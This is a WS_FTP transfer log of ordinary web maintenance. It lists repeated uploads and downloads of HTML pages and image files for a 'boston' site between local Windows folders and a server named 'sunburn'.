10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
